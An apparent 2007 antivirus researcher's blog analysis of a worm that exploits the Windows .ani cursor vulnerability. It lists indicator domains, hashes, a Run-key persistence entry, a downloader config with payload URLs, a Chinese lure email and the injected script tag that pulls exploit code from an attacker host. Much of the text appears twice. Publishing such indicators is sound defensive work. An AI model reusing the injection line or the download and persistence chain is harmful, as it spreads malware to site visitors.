Fake IE 7 Downloads spams
The interesting .ani worm author
It's a bad news that the Windows Animated Cursor Handling zero-day vulnerability has been used by malwares in China now. We have received this kind of new worm today. It has the same behavior as Worm.Win32.Fujacks. It also can infects .HTML .ASPX .HTM .PHP .JSP .ASP and .EXE files, and inserts the malicious links which contained Windows Animated Cursor Handling zero-day vulnerability into .HTML .ASPX .HTM .PHP .JSP .ASP files. It also can send out Chinese spams which are include the same zero-day vulnerability link.
And the author is updating the variants now. We have received different sizes and MD5 hashes. The worm can be downloaded from the following domains, we suggest all users should block now.
The size of this worm is about 13K. MD5 hashes are
Kaspersky can detect two of them as Trojan-Downloader.Win32.Agent.bky.
The main detailed technique report about this worm:
1. Upon execution, it drops the following file:
2. Adds the following entry into registry:
3. Use IE process to download the config file from:
The content of this config file:
5. It also can spread via email as the following:
There are two another links in this url:
The page use the .ani vulnerability,and two urls in it:
This two files are crafted .ANI files which used to download the copy of itself from:
6. Infects .HTML .ASPX .HTM .PHP .JSP .ASP and .EXE files, and inserts the following malicious links which contained Windows Animated Cursor Handling zero-day vulnerability into .HTML .ASPX .HTM .PHP .JSP .ASP files.
In this malicious link,there is another malicous url:
This is a crafted .ANI file which used to download the copy of itself from:
7. In the body of Worm, the author said that he or she hates Kaspersky.
1st Update 11:00pm, Apr.1, 2007
Mcafee has added detection: W32/Fujacks.aa
Kaspersky has added another detection: Trojan-Downloader.Win32.Agent.bkp
Symantec has added detection: W32.Fubalca
F-Secure has added detection: Agent.bky
Last modified by smallmo onApril 13, 2007 23:32
And the author is updating the variants now. We have received different sizes and MD5 hashes. The worm can be downloaded from the following domains, we suggest all users should block now.
2007ip.com
microfsot.com
microfsot.com
The size of this worm is about 13K. MD5 hashes are
99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179
Kaspersky can detect two of them as Trojan-Downloader.Win32.Agent.bky.
The main detailed technique report about this worm:
1. Upon execution, it drops the following file:
%SYSTEM%\sysload3.exe
2. Adds the following entry into registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"
"System Boot Check"="%SYSTEM%\sysload3.exe"
3. Use IE process to download the config file from:
http://a.2007ip.com/<removed>.css
The content of this config file:
[config]
Version=1.0.6
NUM=7
1=http://a.2007ip.com/<removed>/01.gif
2=http://a.2007ip.com/<removed>/02.gif
3=http://a.2007ip.com/<removed>/03.gif
4=http://a.2007ip.com/<removed>/04.gif
5=http://a.2007ip.com/<removed>/05.gif
6=http://a.2007ip.com/<removed>/06.gif
7=http://a.2007ip.com/<removed>/07.gif
hos=http://if.iloveck.com/<removed>/hos.gif
UpdateMe=http://a.2007ip.com/5949645<removed>.exe
tongji=http://if.iloveck.com/<removed>/tongji.htm
Version=1.0.6
NUM=7
1=http://a.2007ip.com/<removed>/01.gif
2=http://a.2007ip.com/<removed>/02.gif
3=http://a.2007ip.com/<removed>/03.gif
4=http://a.2007ip.com/<removed>/04.gif
5=http://a.2007ip.com/<removed>/05.gif
6=http://a.2007ip.com/<removed>/06.gif
7=http://a.2007ip.com/<removed>/07.gif
hos=http://if.iloveck.com/<removed>/hos.gif
UpdateMe=http://a.2007ip.com/5949645<removed>.exe
tongji=http://if.iloveck.com/<removed>/tongji.htm
5. It also can spread via email as the following:
From: i_love_cq@sohu.com
To: [random number]@qq.com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.microfsot.com/<removed>/134952.htm
To: [random number]@qq.com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.microfsot.com/<removed>/134952.htm
There are two another links in this url:
http://macr.microfsot.com/<removed>/NOINDEX.HTM
The page use the .ani vulnerability,and two urls in it:
http://macr.microfsot.com/<removed>/1.jpg
http://macr.microfsot.com/<removed>/2.jpg
http://macr.microfsot.com/<removed>/2.jpg
This two files are crafted .ANI files which used to download the copy of itself from:
http://a.2007ip.com/cs<removed>.exe
6. Infects .HTML .ASPX .HTM .PHP .JSP .ASP and .EXE files, and inserts the following malicious links which contained Windows Animated Cursor Handling zero-day vulnerability into .HTML .ASPX .HTM .PHP .JSP .ASP files.
<script src=http://macr.microfsot.com/<removed>.js></script>
In this malicious link,there is another malicous url:
http://macr.microfsot.com/Ad<removed>.jpg
This is a crafted .ANI file which used to download the copy of itself from:
http://a.2007ip.com/5949645<removed>.exe
7. In the body of Worm, the author said that he or she hates Kaspersky.
1st Update 11:00pm, Apr.1, 2007
Mcafee has added detection: W32/Fujacks.aa
Kaspersky has added another detection: Trojan-Downloader.Win32.Agent.bkp
Symantec has added detection: W32.Fubalca
F-Secure has added detection: Agent.bky
Last modified by smallmo onApril 13, 2007 23:32
